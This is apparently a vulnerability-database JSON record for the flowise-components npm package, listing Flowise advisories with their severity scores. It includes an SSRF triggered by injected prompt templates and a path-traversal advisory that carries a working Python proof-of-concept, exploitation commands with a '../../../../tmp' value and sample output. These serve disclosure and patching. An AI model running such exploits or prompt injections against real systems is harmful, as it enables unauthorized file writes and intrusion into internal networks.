drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) vulnerability exists in FlowiseAI's POST/GET API Chain components that allows unauthenticated attackers to force the server to make arbitrary HTTP requests to internal and external systems. By injecting malicious prompt templates, attackers can bypass the intended API documentation constraints and redirect requests to sensitive internal services, potentially leading to internal network reconnaissance and data exfiltration. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41271","reference_id":"","reference_type":"","scores":[{"value":"0.00115","scoring_system":"epss","scoring_elements":"0.30036","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00115","scoring_system":"epss","scoring_elements":"0.30035","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00115","scoring_system":"epss","scoring_elements":"0.29839","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00115","scoring_system":"epss","scoring_elements":"0.30053","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41271"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41271","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41271"},{"reference_url":"https://github.com/advisories/GHSA-6r77-hqx7-7vw8","reference_id":"GHSA-6r77-hqx7-7vw8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6r77-hqx7-7vw8"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6r77-hqx7-7vw8","reference_id":"GHSA-6r77-hqx7-7vw8","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T19:45:41Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6r77-hqx7-7vw8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41271","GHSA-6r77-hqx7-7vw8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rgmv-6bqh-eqf2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/81038?format=json","vulnerability_id":"VCID-v1nz-wwsu-qycg","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41270","reference_id":"","reference_type":"","scores":[{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24464","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24258","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24454","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24447","published_at":"2026-06-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41270"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41270","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41270"},{"reference_url":"https://github.com/advisories/GHSA-xhmj-rg95-44hv","reference_id":"GHSA-xhmj-rg95-44hv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xhmj-rg95-44hv"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-xhmj-rg95-44hv","reference_id":"GHSA-xhmj-rg95-44hv","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:27:48Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-xhmj-rg95-44hv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41270","GHSA-xhmj-rg95-44hv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v1nz-wwsu-qycg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359770?format=json","vulnerability_id":"VCID-v9hg-7pex-g3dp","summary":"Flowise: Path Traversal in Vector Store basePath\n## Summary\n\nThe Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |\n| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |\n\n## Prerequisites\n\n1. **Authentication**: Valid API token with `documentStores:upsert-config` permission\n2. **Document Store**: An existing Document Store with at least one processed chunk\n3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)\n\n## Root Cause\n\n### Faiss (`Faiss.ts`)\n\n```typescript\nasync upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {\n    const basePath = nodeData.inputs?.basePath as string  // User-controlled\n    // ...\n    const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)\n    await vectorStore.save(basePath)  // Direct filesystem write, no validation\n}\n```\n\n### SimpleStore (`SimpleStore.ts`)\n\n```typescript\nasync upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {\n    const basePath = nodeData.inputs?.basePath as string  // User-controlled\n    \n    let filePath = ''\n    if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')\n    else filePath = basePath  // Used directly without sanitization\n    \n    const storageContext = await storageContextFromDefaults({ persistDir: filePath })  // Writes to arbitrary path\n}\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n1. **Write files to arbitrary locations** on the server filesystem\n2. **Overwrite existing files** if the process has write permissions\n3. **Potential for code execution** by writing to web-accessible directories or startup scripts\n4. **Data exfiltration** by writing to network-mounted filesystems\n\n## Proof of Concept\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Path Traversal in Vector Store basePath (CWE-22)\n\nUsage:\n  python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>\n\"\"\"\n\nimport argparse\nimport json\nimport urllib.request\nimport urllib.error\n\ndef post_json(url, data, headers):\n    req = urllib.request.Request(\n        url,\n        data=json.dumps(data).encode(\"utf-8\"),\n        headers={**headers, \"Content-Type\": \"application/json\"},\n        method=\"POST\",\n    )\n    with urllib.request.urlopen(req, timeout=120) as resp:\n        return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n\ndef main():\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"--target\", required=True)\n    ap.add_argument(\"--token\", required=True)\n    ap.add_argument(\"--store-id\", required=True)\n    ap.add_argument(\"--credential\", required=True)\n    ap.add_argument(\"--base-path\", default=\"/tmp/flowise-path-traversal-poc\")\n    args = ap.parse_args()\n\n    payload = {\n        \"storeId\": args.store_id,\n        \"vectorStoreName\": \"faiss\",\n        \"vectorStoreConfig\": {\"basePath\": args.base_path},\n        \"embeddingName\": \"openAIEmbeddings\",\n        \"embeddingConfig\": {\"credential\": args.credential},\n    }\n\n    url = args.target.rstrip(\"/\") + \"/api/v1/document-store/vectorstore/insert\"\n    headers = {\"Authorization\": f\"Bearer {args.token}\"}\n\n    try:\n        status, body = post_json(url, payload, headers)\n        print(body)\n    except urllib.error.HTTPError as e:\n        print(e.read().decode())\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Setup\n\n1. Create a Document Store in Flowise UI\n2. Add a Document Loader (e.g., Plain Text) with any content\n3. Click \"Process\" to create chunks\n4. Note the Store ID from the URL\n5. Get your embedding credential ID from Settings → Credentials\n\n### Exploitation\n\n```bash\n# Write to /tmp\npython poc.py \\\n  --target http://127.0.0.1:3000 \\\n  --token <API_TOKEN> \\\n  --store-id <STORE_ID> \\\n  --credential <OPENAI_CREDENTIAL_ID> \\\n  --base-path /tmp/flowise-pwned\n\n# Path traversal variant\npython poc.py \\\n  --target http://127.0.0.1:3000 \\\n  --token <API_TOKEN> \\\n  --store-id <STORE_ID> \\\n  --credential <OPENAI_CREDENTIAL_ID> \\\n  --base-path \"../../../../tmp/traversal-test\"\n```\n\n### Evidence\n\n```\n$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned\n\n{\"numAdded\":1,\"addedDocs\":[{\"pageContent\":\"Lorem Ipsum\",\"metadata\":{\"docId\":\"d84d9581-0778-454d-984e-42b372b1b555\"}}],\"totalChars\":0,\"totalChunks\":0,\"whereUsed\":[]}\n\n$ ls -la /tmp/flowise-pwned/\ntotal 16\ndrwxr-xr-x  4 user  wheel   128 Jan 17 12:00 .\ndrwxrwxrwt 12 root  wheel   384 Jan 17 12:00 ..\n-rw-r--r--  1 user  wheel  1234 Jan 17 12:00 docstore.json\n-rw-r--r--  1 user  wheel  5678 Jan 17 12:00 faiss.index\n```","references":[{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w"},{"reference_url":"https://github.com/advisories/GHSA-w6v6-49gh-mc9w","reference_id":"GHSA-w6v6-49gh-mc9w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w6v6-49gh-mc9w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["GHSA-w6v6-49gh-mc9w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v9hg-7pex-g3dp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/108514?format=json","vulnerability_id":"VCID-xr12-v6pr-xqdr","summary":"Flowise <= 2.2.3 is vulnerable to SQL Injection. via tableName parameter at Postgres_VectorStores.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-29189","reference_id":"","reference_type":"","scores":[{"value":"0.00183","scoring_system":"epss","scoring_elements":"0.40019","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00183","scoring_system":"epss","scoring_elements":"0.40031","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00183","scoring_system":"epss","scoring_elements":"0.39849","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00183","scoring_system":"epss","scoring_elements":"0.40041","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-29189"},{"reference_url":"https://github.com/FlowiseAI/Flowise/commit/9a417bdc95f58d6dd92cbf60dad42414aba34754","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/commit/9a417bdc95f58d6dd92cbf60dad42414aba34754"},{"reference_url":"https://github.com/FlowiseAI/Flowise/pull/3818","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/pull/3818"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-29189","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-29189"},{"reference_url":"https://github.com/advisories/GHSA-gjx9-wg9x-7gvp","reference_id":"GHSA-gjx9-wg9x-7gvp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gjx9-wg9x-7gvp"},{"reference_url":"https://drive.google.com/file/d/1WHPslTmQmAM9xPJifULS2qAo7hcidB4L/view?usp=sharing","reference_id":"view?usp=sharing","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-09T14:42:16Z/"}],"url":"https://drive.google.com/file/d/1WHPslTmQmAM9xPJifULS2qAo7hcidB4L/view?usp=sharing"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/376290?format=json","purl":"pkg:npm/flowise-components@2.2.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@2.2.4"}],"aliases":["CVE-2025-29189","GHSA-gjx9-wg9x-7gvp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xr12-v6pr-xqdr"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@1.2.8"}